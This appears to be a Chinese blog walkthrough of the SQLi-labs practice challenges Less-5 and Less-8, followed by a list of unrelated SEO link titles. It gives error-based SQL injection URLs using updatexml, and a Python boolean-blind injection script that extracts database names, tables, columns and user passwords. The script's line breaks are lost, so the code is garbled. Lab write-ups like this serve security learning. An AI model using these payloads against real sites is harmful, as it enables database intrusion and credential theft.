当前位置: 首页 > news >正文

自己做网站空间网络广告投放公司

自己做网站空间,网络广告投放公司,常州网站价格,entware ng wordpresssqllabs5:(报错注入) ?id1 回显You are in........... ?id2-1 回显You are in........... ?id1 回显 1 LIMIT 0,1 判断是字符型,闭合。?id1order by 3-- //页面显示正常我们试了4行得出是报错注入 我们先爆库名 http://127.0.0.1/sqli-labs-master/L…

sqllabs5:(报错注入)

?id=1  回显You are in...........
?id=2-1  回显You are in...........
?id=1'  回显'  '1'' LIMIT 0,1  '判断是字符型,'闭合。
?id=1'order by 3--+    //页面显示正常

我们试了4行得出是报错注入

我们先爆库名

http://127.0.0.1/sqli-labs-master/Less-5/?id='and updatexml(1,concat(0x7e,(select database()),0x7e),3)--+

拿下库名:security

爆表名

http://127.0.0.1/sqli-labs-master/Less-5/?id=-1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)),1)%20--+

拿下表名

然后爆字段:

http://127.0.0.1/sqli-labs-master/Less-5/?id=-1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security')),1) --+

爆数据:

http://127.0.0.1/sqli-labs-master/Less-5/?id=-1' and updatexml(1,concat(0x7e,(select group_concat(username,0x7e,password) from users)),1) --+

数据不完整,因为updatexml()函数的报错内容不超过32个字符,所以我们还需要对数据进行处理

使用substring()函数对结果字符进行处理

?id=-1' and updatexml(1,concat(0x7e,substring((select group_concat(username,0x7e,password) from users),32,64)),1) --+

之后我们就可以不断改变位置,这样我们就可以得到所有数据,后续的操作不再演示

sqllabs8:布尔盲注

报错注入被注释掉了

联合查询只出现you are in ..........

所以这里我们能看见一真一假(页面特征)

不加'时为真

http://127.0.0.1/sqli-labs-master/Less-8/?id=1

加入'时为假

http://127.0.0.1/sqli-labs-master/Less-8/?id=1'

我们可以用布尔盲注

我们数据库名:

security,s的ascii码是115,我们可以一个一个试一试

http://127.0.0.1/sqli-labs-master/Less-8//?id=1' and ascii(substring((select database()),1,1))=115--+

利用二分法和ASCII码进行渗透:

根据此现象我们写一个python脚本快速进行注入

import time
import requestsurl = 'http://127.0.0.1/sqli-labs-master/Less-8/index.php'def inject_database(url):name = ''for i in range(1, 50):low = 32high = 128mid = (low + high) // 2while low < high:payload = "1' and ascii(substr(database(), %d, 1)) > %d-- " % (i, mid)res = {"id": payload}# start_time = time.time()r = requests.get(url, params=res)# end_time = time.time()if 'You are in...........' in r.text:low = mid + 1else:high = midmid = (low + high) // 2if mid == 32:breakname = name + chr(mid)print(name)inject_database(url)

爆库名;

爆表名:

payload = "1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()), %d, 1)) > %d-- " % (i, mid)

爆列名:

payload = "1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'), %d, 1)) > %d-- " % (i, mid)

爆数据:

payload = "1' and ascii(substr((select group_concat(username,'$',password) from users), %d, 1)) > %d-- " % (i, mid)

http://www.tj-hxxt.cn/news/82963.html

相关文章:

  • 怎么和网站主联系方式外贸软件排行榜
  • 网站策划书案例展示推广码怎么填
  • 制作网站首先做的是百度一下就知道官网
  • 网站响应速度多少合适大数据精准营销获客
  • 长沙营销网站建设品牌营销案例分析
  • 密云住房建设委员会官方网站做网站的软件
  • 哪些公司网站做的好网址外链平台
  • 用wordpress怎么做网站百度文库登录入口
  • wordpress教程阿里云seo外包优化公司
  • 国际b2b网站大全怎么样创建网站
  • 义乌网站建设方案案例百度查重入口
  • 1280的界面网站做多宽360搜索引擎的特点
  • 摄影网站设计思想百度推广新手入门
  • 网站隐藏链接怎么做活动推广方案策划
  • 看电影电视剧的好网站纤纤影院创建网站的流程
  • 那个网站可以做软件出售的临沂seo推广外包
  • 学做网站论坛vip百度推广怎么做效果好
  • 服装网站源码php国外推广渠道平台
  • 购物商城网站建设公司网站交易
  • 青岛做网站多少钱比较正规的代运营
  • 免费模板网站下载足球比赛统计数据
  • 上海建设厅网站首页网络推广中心
  • 移动端网站宽度做多大seo优化及推广如何运营
  • 二维码怎么做网站seo推广岗位职责
  • 做非法网站怎么判刑做网络推广费用
  • 高淳哪家做网站不错网络科技公司经营范围
  • 南昌珠峰网站建设chrome浏览器下载安卓手机
  • 建设工程质量管理条例网站网络优化公司
  • wordpress双栏专业seo培训
  • 怎么做带后台的网站地推公司